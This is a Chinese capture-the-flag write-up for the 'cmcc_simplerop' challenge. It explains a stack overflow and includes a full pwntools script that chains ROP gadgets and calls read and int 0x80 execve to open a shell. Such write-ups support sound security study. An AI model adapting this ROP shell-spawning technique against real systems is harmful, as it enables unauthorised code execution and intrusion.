系统调用 + rop

# cmcc_simplerop

# 程序分析

32 位程序，开了 NX，部分 RELRO 保护

主函数存在栈溢出

该题 没有 system 函数和’/bin/sh’，考虑使用 int 80 系统调用，地址为 0x080493e1

设置系统调用 int80 (11,"/bin/sh",null,null") 的参数 eax,ebx,ecx,edx

找到 eax，进行赋值，地址为 0x080bae06

找到 pop edx;pop,ecx;ret，地址为 0x0806e850

接下来调用 read 函数，将 /bin/sh 写入 bss 段，没有开 PIE，bss 地址为绝对地址。

# EXP

#coding=utf-8
from pwn import *

context(os = "linux", arch = "i386", log_level= "debug")
# p = remote("node4.buuoj.cn", 29088)
p = process('./simplerop')

read_addr = 0x0806cd50
int_80 = 0x080493e1
pop_eax_ret = 0x080bae06
pop_edx_ecx_eax_ret = 0x0806e850
bss_addr = 0x080eb584

payload = "a" * 0x20 + p32(read_addr)       # 返回到read函数
payload += p32(pop_edx_ecx_eax_ret)			# 平衡栈空间
payload += p32(0) + p32(bss_addr) + p32(8)	# read函数的三个参数 
payload += p32(pop_eax_ret) + p32(0xb)		# 对eax进行赋值为11
# 对edx、ecx、ebx进行赋值
payload += p32(pop_edx_ecx_eax_ret) + p32(0) + p32(0) + p32(bss_addr)
payload += p32(int_80)

p.sendlineafter(":", payload)
p.sendline("/bin/sh\x00")

p.interactive()